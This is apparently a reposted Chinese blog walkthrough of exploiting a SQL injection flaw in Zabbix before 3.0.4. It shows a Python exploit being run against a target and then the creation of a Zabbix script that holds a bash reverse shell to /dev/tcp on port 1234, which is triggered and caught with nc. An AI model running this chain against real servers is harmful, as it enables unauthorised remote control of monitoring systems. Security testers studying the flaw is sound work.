码迷,mamicode.com
首页 > 数据库 > 详细

Zabbix sql注入漏洞脚本执行反弹shell

时间:2018-05-18 20:11:57      阅读:1289      评论:0      收藏:0      [点我收藏+]

标签:pytho   分享图片   one   zabbix   ubunt   http   exploit   登录   监测   

exp检测是否存在SQL注入漏洞
root@ubuntu:~# python zabbix.py http://ip:9090/
+------------------------------------------------------------+
Python Zabbix<3.0.4 SQL注入 Exploit
success
+------------------------------------------------------------+
Zabbix 存在SQL注入漏洞!技术分享图片

管理员 用户名密码:None

管理员 Session_id:None
然后进行登录:管理——脚本——创建脚本写入反弹shell、
bash -i >& /dev/tcp/xxx/1234 0>&1

 技术分享图片

技术分享图片

监测——触发器——主机

技术分享图片

执行我们编写的反弹shell脚本

技术分享图片

Nc监听端口

技术分享图片

 

技术分享图片

Zabbix sql注入漏洞脚本执行反弹shell

标签:pytho   分享图片   one   zabbix   ubunt   http   exploit   登录   监测   

原文地址:https://www.cnblogs.com/someone9/p/9057591.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!